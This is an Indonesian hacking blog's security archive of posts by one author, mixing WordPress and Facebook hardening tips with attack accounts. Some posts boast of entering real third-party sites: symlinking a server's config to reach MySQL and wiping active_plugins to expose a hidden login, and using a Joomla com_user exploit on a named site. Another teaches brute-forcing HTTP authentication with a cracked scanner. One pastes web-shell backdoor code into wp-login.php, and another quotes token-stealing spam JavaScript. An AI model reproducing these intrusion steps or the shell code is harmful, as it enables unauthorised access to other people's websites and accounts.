Tampilkan postingan dengan label Security. Tampilkan semua postingan
Tampilkan postingan dengan label Security. Tampilkan semua postingan

Kamis, 12 Juni 2014

Bypass Halaman Login Wordpress yang di Redirrect

Posted by Erza Jullian 02.41, under ,, | No comments

Jadi ceritanya tadi iseng iseng dapet config masterweb ( server Indo ) , udah di symlink, udah masuk MySQL Interface, eh pas web nya mau di eksekusi ternyata halaman loginnya gak bisa diakses . Webnya pake Wordpress. Loginnya disembunyikan. Jadi setiap diakses wp-login.php selalu redirrect ke index.php . pas ditest /wp-admin/ url nya tetep , tapi tampilannya tetep tampilan index.php .






Problem nya gan .

Akhir nya gue berasumsi nih situs pasti pake plugins . Entah plugins apa nama nya .

Ane cari deh kolom active_plugins di wp_options.



Selanjut nya , karena ane gak tau plugins apa yang dipake, hapus aja value dari active_plugins . Semuanya !





Dan sekarang coba masuk ke wp-login.php . :D



JEBRETTTT !!!!

kebuka !



NB : cara ini hanya bisa dilakukan jika web tersebut mengguakan plugins, bukan settingan .htaccess .

Jadi saya sarankan buat para webmaster, jangan etrlalu mengandalkan plugins. Mending pakai .htaccess . Saya tau mungkin alasan kalian menggunakan plugins karena lebih simpel , gak ribet karena tinggal install . tapi kekurangannya, plugins terhubung dengan database . Jadi jika config nya kena, percuma plugins yang kalian pasang tidak akan berfungsi apa apa . ;)



Sekian dari saya, semoga bermanfaat .

Senin, 24 Maret 2014

Mengamankan Halaman Login dari Serangan Brute Force | Dengan .htaccess dan .htpasswd

Posted by Erza Jullian 04.06, under | No comments

Halooo... Assalamualaikum .. :)

Hampir setengah bulan gak posting . Lagi sibuk Ujian Sekolah . Mumpung ada waktu kali ini saya mau share cara mengamankan halaman Login dari serangan Brute Force. Sebenarnya trik ini berlaku untuk semua website ya , tapi kali ini tutorialnya saya ambil WordPress . kalo untuk CMS lain bisa menyesuaikan sendiri .

Beberapa waktu lalu saya sudah share cara hack wordpress dengan bruteforce . Kenapa hal itu bisa dilakukan ? Jawabannya adalah siapapun bisa masuk ke halaman login dengan bebas. :)

Contoh :



Nah , kita bisa menambahkan autentikasi ganda pada halaman login tersebut dengan .htaccess dan .htpassword .



Untuk langkah langkah nya , silahkan simak dibawah :)

Pertama, buka link Htpassword Generator untuk membuat htpasswd.

maka kalian akan mendapatkan hasil dari htpasswd tadi.

Contoh :

root:$apr1$9tm1H5av$QqilLDZWJoLi/RzvESU.01

$apr1$9tm1H5av$QqilLDZWJoLi/RzvESU.01 adalah enkripsi dari kata superuser .

Untuk lebih jelasnya lihat gambar :






Langkah selanjutnya , masuk ke cPanel / hosting kalian lalu buat file dengan nama .htpasswd di direktori /wp-admin/


isi dengan root:$(apr1$9tm1H5av$QqilLDZWJoLi/RzvESU.01 ( user dan password sesuai dengan yang telah kalian buat ).


Masih di direktori wp-admin , buat file dengan nama .htaccess dan isi dengan kode berikut :



# DO NOT REMOVE THIS LINE AND THE LINES BELOW PWPROTECTID:yGeNybaPyH

AuthType Basic

AuthName " don't touch me !! "

AuthUserFile [dir lokasi htpasswd]/.htpasswd

Require user admin

# DO NOT REMOVE THIS LINE AND THE LINES ABOVE yGeNybaPyH:PWPROTECTID





Dir lokasi htpasswd maksudnya adalah letak file htpassword dibuat . Dimulai dari  home root

Contoh :

/home/u770981521/public_html/b0x/wp-admin/.htpasswd



Lihat gambar untuk lebih jelas nya :



Save , dan selasai !

Hasilnya , jika seseorang ingin masuk ke halaman login harus memasukkan autentifikasi terlebih dahulu :)





dan ketika data yang dimasukkan salah , maka halaman login tidak akan terbuka :D





Sekian tutorial kali ini, semoga bermanfaat :)

Minggu, 08 Desember 2013

Tutorial | How to Patch Bug Exploit Joomla Com_User

Posted by Erza Jullian 14.44, under | No comments

Oke, kali ini saya mau share tutor buat patch bug exploit com_user. cara lama sih, yang seneng maen com_user pasti tau :D . Buat yang belum tau aja ayo simak bareng-bareng :v . langsung aja ya :p

Sebagai bahan tutorial, kali ini saya mau ngepatch http://imagineer.co.za

Seperti biasa, kalo mau deface lewat com_user pasti masuk lewat sini :

http://imagineer.co.za/index.php?option=com_users&view=registration



Singkat cerita, aku bisa masuk ke halaman admin pake exploit com_user :v

Toh bahasan kita kali ini ngepatch nya kan, kalo cara masuk nya udah mainstream :p



Langkah selanjutnya adalah klik menu Users > User Manager

Liat gambar :



Lalu klik Options

Liat gambar :v



lalu, Allow User Registration , pilih NO . Setelah itu klik Save

SS :



Sekarang coba kalian buka url registrasi nya , pasti diredirrect ke

http://imagineer.co.za/index.php/component/users/?view=login



Gak ada lagi yang bisa registrasi. Kan dapet pahala tuh bantuin adminnya :v



Sekian tutorial kali ini, semoga bermanfaat. :D

Selasa, 20 Agustus 2013

Cara Menemukan Username dan Password pada Authentication Required dengan Bruteforce

Posted by Erza Jullian 16.17, under , | No comments

Sebenarnya saya sendiri bingung , apakah judul postingan saya  sudah benar :3 .Karena trik ini baru saya temukan liburan lalu. :D

Oke langsung saja. Biasanya kita sering menemukan web yang halaman loginnya menggunakan autentifikasi. Kadang web yang vuln SQLi, user, password, dan halaman login sudah ketemu namun ternyata halaman login dilindungi Authentication Required.



kali ini saya testnya di localhost saja ya :v . Maklum, lagi gak ada target. Saya coba dengan privat shell yang juga dilindungi Authentication Required.

Kira-kira tampilannya seperti ini :





Lalu bagaimana cara agar kita bisa login ?

Kita bisa mencoba melakukan bruteforce attack dengan menggunakan tools Accunetix. Yang belum tau tools Accunetix, silahkan cari sendiri di Google. Banyak kok yang sudah di crack :p .

Oke, langsung saja buka tools Accunetix Scanner, lalu pilih Authentication Tester.

Lihat gambar :





Lalu isi url, list user dan password.





Target URL to test : isi dengan url target yang akan dibruteforce

Username dictionary path : letak file .txt yang berisi list username. Silahkan sesuaikan sendiri

Password dictionary path : letak file .txt yang berisi list password. Silahkan sesuaikan sendiri

Lalu klik start untuk memulai bruteforce.

Tunggu sampai proses bruteforce selesai. Jika berhasil, maka hasilnya akan tampak seperti gambar dibawah ini :





Valid combinations :

http://localhost/shell/48.php with username "yuyud" and password "sinkajuliani" <-- jangan ditanya. Emang udah cocok dari dulu :p

Lalu coba kita login shell di localhost tadi dengan user : yuyud , pass : sinkajuliani .





Oke, berarti yuyud - sinkajuliani emang cocok 8|



NB : trik ini bisa digunakan di semua web yang menggunakan autentifikasi. Tidak hanya shell saja namun juga admin login dsb.

Trik bruteforce adalah teknik yang membutuhkan kesabaran karena kita mencoba login dengan mengecek semua kata/word yang sudah dimasukkan kedalam list. Semakin banyak wordlist, semakin besar kemungkinan kita untuk mendapatkan username dan password login.

Cara menghindari teknik ini adalah gunakan kombinasi huruf dan angka serta karakter yang susah untuk ditebak . =))



Sekian tutorial kali ini, semoga bermanfaat.




Selasa, 04 Juni 2013

Melindungi Halaman Login Wordpress dengan Tampilan Error 404 Not Found

Posted by Erza Jullian 15.18, under | No comments

Beberapa waktu yang lalu saya pernah share cara menyembunyikan halaman login pada wordpress dengan cara mengganti alamat default loginnya yaitu /wp-login.php . Namun mungkin cara itu tergolong ribet karena kode yang harus diganti jumlahnya lebih dari sepuluh. Ada cara yang lebih praktis. Yaitu menutup halaman login WP dengan Halaman Error 404 Not Found.

Jadi saat  site/wp-login.php diakses maka tampilan awalnya adalah Error 404 Not Found. Bagi yang sering memakai backdoor shell macam 1n73ction atau blackshadow pasti tau yang saya maksud. Ya, halaman 404 Not Found tersebut sebenarnya dilindungi password bertipe md5.

Oke, daripada bingung langsung saja kita praktekkan. :)



Pertama, masuk akun cpanel sobat.

Kedua, masuk menu file manager.

Masuk direktori Wordpress sobat.

Cari file wp-login.php . Buka file tersebut.

Hapus kode <?php di paling atas dan ganti dengan script dibawah ini.

ini scriptnya :




<?php

error_reporting(E_ALL^(E_NOTICE|E_WARNING));

//authentication

$auth_pass = "102a6ed6587b5b8cb4ebbe972864690b"; //password ente dlm bentuk md5

$color = "#00ff00";

$default_action = 'FilesMan';

@define('SELF_PATH', __FILE__);

if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {

    header('HTTP/1.0 404 Not Found');

    exit;

}

@session_start();

@error_reporting(0);

@ini_set('error_log',NULL);

@ini_set('log_errors',0);

@ini_set('max_execution_time',0);

@set_time_limit(0);

@set_magic_quotes_runtime(0);

@define('VERSION', '2.1');

if( get_magic_quotes_gpc() ) {

    function stripslashes_array($array) {

        return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);

    }

    $_POST = stripslashes_array($_POST);

}

function printLogin() {

    ?>

<h1>Not Found</h1>

<p>The requested URL was not found on this server.</p>

<hr>

<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>

    <style>

        input { margin:0;background-color:#fff;border:1px solid #fff; }

    </style>

    <form method=post>

    <input type=password name=pass>

    </form>

    <?php

    exit;

}

if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))

    if( empty( $auth_pass ) ||

        ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )

        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;

    else

        printLogin();



if( strtolower( substr(PHP_OS,0,3) ) == "win" )

    $os = 'win';

else

    $os = 'nix';

$safe_mode = @ini_get('safe_mode');

$disable_functions = @ini_get('disable_functions');

$home_cwd = @getcwd();

if( isset( $_POST['c'] ) )

    @chdir($_POST['c']);

$cwd = @getcwd();

if( $os == 'win') {

    $home_cwd = str_replace("\\", "/", $home_cwd);

    $cwd = str_replace("\\", "/", $cwd);

}

if( $cwd[strlen($cwd)-1] != '/' )

    $cwd .= '/';

    

if($os == 'win')

    $aliases = array(



    );

else

    $aliases = array(



    );


Sehingga nanti menjadi :




<?php

error_reporting(E_ALL^(E_NOTICE|E_WARNING));

//authentication

$auth_pass = "102a6ed6587b5b8cb4ebbe972864690b"; //password ente dlm bentuk md5

$color = "#00ff00";

$default_action = 'FilesMan';

@define('SELF_PATH', __FILE__);

if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {

    header('HTTP/1.0 404 Not Found');

    exit;

}

@session_start();

@error_reporting(0);

@ini_set('error_log',NULL);

@ini_set('log_errors',0);

@ini_set('max_execution_time',0);

@set_time_limit(0);

@set_magic_quotes_runtime(0);

@define('VERSION', '2.1');

if( get_magic_quotes_gpc() ) {

    function stripslashes_array($array) {

        return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);

    }

    $_POST = stripslashes_array($_POST);

}

function printLogin() {

    ?>

<h1>Not Found</h1>

<p>The requested URL was not found on this server.</p>

<hr>

<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>

    <style>

        input { margin:0;background-color:#fff;border:1px solid #fff; }

    </style>

    <form method=post>

    <input type=password name=pass>

    </form>

    <?php

    exit;

}

if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))

    if( empty( $auth_pass ) ||

        ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )

        $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;

    else

        printLogin();



if( strtolower( substr(PHP_OS,0,3) ) == "win" )

    $os = 'win';

else

    $os = 'nix';

$safe_mode = @ini_get('safe_mode');

$disable_functions = @ini_get('disable_functions');

$home_cwd = @getcwd();

if( isset( $_POST['c'] ) )

    @chdir($_POST['c']);

$cwd = @getcwd();

if( $os == 'win') {

    $home_cwd = str_replace("\\", "/", $home_cwd);

    $cwd = str_replace("\\", "/", $cwd);

}

if( $cwd[strlen($cwd)-1] != '/' )

    $cwd .= '/';

  

if($os == 'win')

    $aliases = array(



    );

else

    $aliases = array(



    );





/**

 * WordPress User Page

 *

 * Handles authentication, registering, resetting passwords, forgot password,

 * and other user handling.

 *

 * @package WordPress

 */



/** Make sure that the WordPress bootstrap has run before continuing. */

require( dirname(__FILE__) . '/wp-load.php' );



// Redirect to https login if forced to use SSL

if ( force_ssl_admin() && !is_ssl() ) {

if ( 0 === strpos($_SERVER['REQUEST_URI'], 'http') ) {

wp_redirect(preg_replace('|^http://|', 'https://', $_SERVER['REQUEST_URI']));

exit();

} else {

wp_redirect('https://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);

exit();

}

  --------- ---- dan seterusnya -----------------------



<?php

login_footer();

break;

} // end action switch

?>





Kode yang saya beri warna merah itu adalah password bertipe md5.

Anda bisa menggantinya di situs-situs untuk convert password menjadi md5 atau bisa menggunakan tools saya. :v

Klik Disini. - Tools Hash Password

Masukkan kata yang ingin di encode. Jika sudah, pilih yang MD5





Contoh password md5 :

nabilah : 6138f95a7e66e7373c8d770ad348d13c

achan : 39a54ee9b50e3484df126d83277593dc

jeje : 21dbd9ee5a8e54ec3157e76b32ce450c



dll.

Intinya, password harus bertipe md5. Setelah itu, klik save. Done. Coba cek page login wordpress sobat. Pasti yang muncul adalah halaman 404 Not Found. Lalu klik tombol TAB di keyboard sebanyak 2x, maka akan ada form password.





Masukkan password yang sudah sobat convert menjadi md5 pada tutorial di atas. Maka halaman login akan terbuka. :)





Untuk live demo silahkan lihat disini :

Live Demo

Sekian tutorial kali ini. Semoga bisa mempersulit lamer yang ingin membobol WP sobat. :v

Jika ada yang kurang jelas, silahkan beri komentar. :)

Created by Nabilaholic - Madura Cyber



Source : Thread nya bang e1nzte1n di www.hacker-newbie.org

Senin, 06 Mei 2013

Cara Menyembunyikan Alamat WP Login

Posted by Erza Jullian 12.46, under | No comments

Hanya bisa merusak, merusak, dan merusak. Ya, itulah yang saya pikirkan beberapa waktu lalu. Ketika seorang hacker berhasil melakukan symlink terhadap Wordpress sobat, biasanya mereka akan mereset password salt dan login ke akun Wordpress yang sudah direset passwordnya. Dan hal ini dimudahkan dengan settingan default alamat login Wordpress sobat yaitu di [localhost]/wp-login.php .

Atau mungkin saja attacker yang lebih dulu menemukan link login Wordpress sobat [belum mendapatkan password] mencoba melakukan bruteforce untuk mendapatkan password sobat. Lalu bagimana cara kita melindungi alamat login Wordpress dari para hacker ? Dengan menyembunyikannya. Caranya ?

Ikuti langkah-langkah berikut :

1. Pertama, login ke akun Cpanel sobat.

2. Kedua, masuk ke menu File Manager.

3. Ketiga, cari file wp-login.php dan rename dengan alamat login yang baru. Sebagai contoh, saya rename menjadi nabilah.php [ingat, file harus berekstensi .php]

4. Lalu buka file nabilah.php tadi dan rename semua kata "wp-login" dengan kata "nabilah" . Setelah saya hitung, seluruhnya ada tigabelas kata "wp-login" . Klik save.

Selanjutnya, masuk table wp-includes dan cari file general-template.php.

Buka file general-template.php dan ganti semua kata "wp-login" menjadi "nabilah". Semuanya ada lima kata "wp-login" . Klik save.



Sampai disini, mungkin attacker tidak bisa menemukan halaman login Wordpress sobat jika yang dicari adalah file berekstensi .php . Namun ternyata attacker masih bisa menemukan halaman login yang sudah kita sembunyikan tersebut karena saat kita mengetik alamat [localhost]/wp-admin , maka akan diredirrect ke [localhost]/nabilah.php . Nah, percuma dong disembunyikan. Tenang, masih bisa diakali.



5. Sekarang, buat file berkestensi .php di direktori Wordpress sobat. [Jika Wordpress diinstall di public_html, silahkan buat filenya di public_html . Silahkan disesuaikan sendiri]. Sebagai contoh, saya buat file dengan nama achan.php . File achan.php tersebut saya isi dengan tulisan "Hello hacker, are you fucking kidding me ? :p" . Lalu klik save.

Buka lagi file general-template.php yang ada di wp-includes.

Lalu cari kode berikut function wp_login_url . Atau lengkapnya seperti ini :

function wp_login_url($redirect = � �, $force_reauth = false) {

$login_url = site_url(�nabilah.php�, �login�);

Ganti tulisan berwarna biru, "nabilah.php" menjadi "achan.php"



Dan sekarang, coba anda logout dari Dashboard WP sobat, coba masuk kembali namun kali ini masuk lewat [localhost]/wp-admin . Maka sobat akan diredirrect ke halaman [localhost]/achan.php dan akan menjumpai tulisan Hello hacker, are you fucking kidding me ? :p .



NB : Sekarang sobat harus login dengan alamat [localhost]/nabilah.php karena selain itu tidak bisa.



Sekian tutorial kali ini, semoga bermanfaat.



Refrensi



Cara mengamankan WP Admin - Cara menyembunyikan alamat login Wordpress - Cara menyembunyikan WP Admin

Selasa, 19 Maret 2013

Tips Agar Facebook Aman dari Serangan Hacker

Posted by Erza Jullian 13.33, under , | No comments

Kali ini saya akan share cara mengamankan akun Facebook dari serangan hacker. Dari jaman nenek moyang sampai sekarang, hack akun facebook masih menjadi tren. Motifnya macam-macam, ada yang punya dendam pribadi, pamer, atau coba-coba. Atau bisa juga mau nyolong chip poker. Ayo ngaku aja deh. :v

Terus gimana caranya agar akun facebook kita aman dari serangan hacker ?

Simak tips-tips berikut :



Kekuatan Password

Kombinasikan password menggunakan angka dan huruf. Dan harus diakui, disinilah tulisan alay diperlukan. :v . Dan rajinlah mengganti password. Mungkin sebulan sekali.



Hindari Auto Like dan Bot Komen

Sebelumnya saya ingin bertanya . Apa sih untungnya pake autolike ? Apa kalo misalnya statusmu dilike 1000x terus temen-temen pada ngasih hadiah gitu ? pada bilang WOW gitu ? Enggak juga kan. Jadi mending dihindari. Sadar enggak, saat menggunakan autokomen ataupun autolike, pasti aplikasinya minta akses token. Secara tidak sadar kalian telah memberikan "kunci pagar" facebook kalian padai si pembuat aplikasi. Dengan akses token tersebut, hacker bisa membuat status dengan facebookmu, atau malah mereset password mu. Jadi mending hindari hal-hal yang tidak perlu.



Gunakan Keyboard Virtual di Warnet

Kadang di warnet yang tidak terpasang deepfreeze, atau yang terpasang sekalipun, hal itu digunakan oleh orang yang tidak bertanggung jawab untuk memasang keylogger. Cara kerja keylogger adalah merekam semua ketukan keyboard saat kamu online dan itu artinya dia bisa merekan akun dan password facebook kalian. Cara menghindarinya, gunakan keyboard virtual saat login. Ini berlaku untuk semua akun. Bukan hanya facebook.



Security Qustion

Ini penting. Setting security question anda untuk menghindari hal yang tidak dinginkan. Dan gunakan jawaban yang nggak nyambung. Contoh : Siapakah nama ayah anda ? Jawaban : pacar gue nabilah

Dijamin yang suka nebak security question pasti pasrah. :v



Waspadai Social Enginering

Dan ini yang paling penting ! jangan pernah termakan rayuan akun facebook cewek yang samasekali anda belum kenal. bisa jadi dibalik akun cewek tersebut adalah laki-laki bangsat.

Jangan pernah mau menggunakan aplikasi diluar facebook apapun yang membutuhkan akses login ke facobook kamu. Pastikan saat login alamatnya benar. www.facebook.com .Jika bukan itu, lebih baik jangan !

Masih seputar soceng, jangan pernah menggunakan aplikasi yang tidak kamu kenal. Contoh : Tools Hack Facebook, Cheat Poker, atau sebangsanya. Bisa jadi aplikasi tersebut disisipi trojan ataupun keylogger. Gunakan nalar anda, kalo ada yang namanya Tools hack facebook, semua orang bisa jadi hacker. Kalo ada software cheat chip poker, Zynga bisa bangkrut dong. Dan dari situ harusnya kalian sudah sadar.



Sekian yang bisa saya sampaikan, dan ingat ;

THERE IS NO PATCH FOR HUMAN STUPIDITY



jadi, berhati-hatilah sendiri !



Nabilaholic404

Minggu, 03 Februari 2013

Hati-Hati Dengan Spam Bermodus Autolike

Posted by Erza Jullian 12.55, under , | No comments


Beberapa hari terakhir Grup Facebook SMAN 2 Bangkalan kebanjiran spam yang isinya tidak jelas. Ada yang promosi autolike, ada yang promosi video bok*p dan masih banyak lagi. Awalnya saya biasa saja toh itu bukan fb saya. Namun lama kelamaan nganggu juga....

Meskipun ada kata-kata yang berbeda, namun ada satu kesamaan yaitu update via Sony Xperia. Maka saya semakin yakin bahwa teman saya sudah tertipu dengan iming-iming autolike. Lalu saya menuju salah satu website yang dipromosikan tersebut. Situsnya memakai blogspot . Untuk menggunakan autolike tersebut ternyata kita membutuhkan akses token. Ini SSnya :




Anda harus memasukkan token !!!



Dan langsung saya ctrl+u untuk melihat kode-kode mencurigakan. WTF !!!!! Ini spam !!!! Intinya, saat kita memasukkan token facebook kita ke kotak tersebut, maka tanpa kita sadari akun kita akan membuat spam otomatis di setiap grup facebook yang diikuti.

Ini SSnya :




Kata-Kata Spam

Di tulisan yang saya blok tersebutlah letak spamnya. Ada tulisan begini :

  $.getJSON('https://graph.facebook.com/328290510514876/feed?method=post&message= Wow akhir ya saya bisa juga menggunakan auto like dan auto subscribe gampang kok tinggal klik [*http://Rialdiautolike-2.blogspot.com*] dijamin aman&set=a.310233775750685.72919.100002921947780&type=1<<<</&access_token='+ajAing.aksestoken,function(){});

        $.post('https://graph.facebook.com/268989016534354/comments', {

                access_token: ajAing.aksestoken,

                message: 'calisiyor'




 Jelas sekali kalo spam kan ? Kata-kata tersebut akan tertulis otomatis tanpa anda menyadarinya. Sangat bodoh sekali jika sobat tetap memakainya. :p



Jadi, saya harap jangan terlalu percaya dengan autolike. Apalagi yang menggunakan akses token. 99% autolike yang menggunakan token adalah spam ! Dan perlu diketahui, token sangat berguna untuk mereset password facebook sobat. Jadi bisa saja penipu berkedok autolike tersebut berniat jahat untuk mereset password facebook sobat. Sayang sekali kan kalo cuman mau make autolike sampai harus kehilangan akun facebook ? Saran saya, jika ingin menggunakan autolike, gunakan autolike yang tidak perlu memakai akses token !

Blog Archive

Blog Archive